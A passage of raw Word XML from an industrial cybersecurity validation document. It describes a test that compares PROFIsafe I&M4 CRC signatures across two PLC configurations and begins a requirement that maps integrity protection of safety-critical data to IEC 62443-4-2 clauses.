      <w:tr w:rsidR="00CC02C9" w:rsidRPr="006D5B99"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C02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02C9">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577C121E" w14:textId="24A57EB4"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fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">TIA laptop, PLC, SRIO </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC02C9" w:rsidRPr="006D5B99"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C02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02C9">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24564B3E" w14:textId="7443C3AC"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TIA (I&amp;M4 read), config A/B projects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC02C9" w:rsidRPr="006D5B99"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C02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02C9">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B3502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Load configuration A:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB5D41C"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Hardware/network view &gt; SRIO module (AL400S) &gt; Properties &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399727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da-DK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t>#    Module parameters &gt; e.g. set 'Filter F-DI 1' = 10 ms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E02BB5"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Recalculate iParCRC: right-click module &gt; 'Start device tool' &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F9BF5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'ifm-CRC-Tool' &gt; confirm parameters correct &gt; copy F_iPar_CRC &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582DEE0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paste into Properties &gt; PROFIsafe &gt; F-Parameters &gt; F_iPar_CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75116DB0" w14:textId="29EAD812"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Project &gt; Compile &gt; Online &gt; Download to device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A9EF66"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Read I&amp;M4 in TIA:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A51FCA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TIA Portal &gt; Online &amp; Diagnostics &gt; Identification &amp; Maintenance &gt; I&amp;M4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6655D839"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(record the SIGNATURE value = F_iParCRC + F_Par_CRC as hex)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0654E8D7"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Load configuration B (materially different, e.g. Filter F-DI 1 = 5 ms +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02752353"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Symmetry changed from 1oo1 to 1oo2): repeat step 1's parameter </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>change +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D8E8DD" w14:textId="77777777" w:rsidR="00CC02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02C9">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ifm-CRC-Tool recalculation + compile + download.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106F72FE" w14:textId="366A4B97" w:rsidR="00CC02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02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Read I&amp;M4 again (as in step 2); compare the two signature values.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC02C9" w:rsidRPr="006D5B99"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0445AF82" w:rsidR="00CC02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02C9">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2FEBAC" w14:textId="77777777" w:rsidR="007B71C1"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distinct configs </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> distinct I&amp;M4 signatures (data identified via fingerprint). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE95922" w14:textId="0C70E793" w:rsidR="00CC02C9" w:rsidRPr="006D5B99" w:rsidRDefault="00CC02C9" w:rsidP="00CC02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Documented limitation: signature identifies that a config is loaded, not which elements are EHSR-critical. Evidence: two TIA I&amp;M4 screenshots + config notes.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C0D2A73" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1022530D" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7BE40F" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A2A990" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C77C58" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337D6D6A" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110758C9" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4820359A" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B58E097" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB9E519" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727EBE6C" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4502EE" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F7B13A" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5B9D36" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B40AFBD" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A46047" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CCB3D6" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED971D0" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67453ED6" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016D2098" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B18C8F7" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1C78D9" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2754387C" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F2C94F" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE1EDFF" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B369EBD" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14341791" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C620EF" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A7D958" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3A79C5" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4774D282" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA78465" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218481C4" w14:textId="77777777" w:rsidR="003D1CA7" w:rsidRPr="006D5B99" w:rsidRDefault="003D1CA7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E38F72A" w14:textId="77777777" w:rsidR="003D1CA7" w:rsidRPr="006D5B99" w:rsidRDefault="003D1CA7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5983FD2B" w14:textId="77777777" w:rsidR="003D1CA7" w:rsidRPr="006D5B99" w:rsidRDefault="003D1CA7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B98B8A" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123B333D" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BE7DC6" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A9A7F0" w14:textId="77777777" w:rsidR="009E3751" w:rsidRPr="006D5B99" w:rsidRDefault="009E3751" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1669728A" w14:textId="5A9F2222" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENT 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BD918" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1: Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA45A10" w14:textId="7C18443A" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78200AAD" w14:textId="689BD38D" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall protect identified safety-critical software and data against corruption, whether accidental or intentional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00467A39" w14:textId="6F96F0FD" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR </w:t>
      </w:r>
      <w:r w:rsidR="002545AA" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.4,</w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR 3.10,</w:t>
      </w:r>
      <w:r w:rsidR="00317411" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.12, EDR 3.13,</w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR 3.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB9B6C" w14:textId="0F325AB3" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="007970D9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B (Runtime integrity), D (image integrity)</w:t>
      </w:r>
      <w:r w:rsidR="002417CF" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60165959" w14:textId="6C8650AF" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0A46" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66FAB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Spoofing,) </w:t>
      </w:r>
      <w:r w:rsidR="007970D9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65536FE6" w14:textId="77777777" w:rsidR="006E773B" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D643C2B" w14:textId="6216420C"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 xml:space="preserve">iParCRC (UINT32) + F_ParCRC (UINT16): Verified each parametrization </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
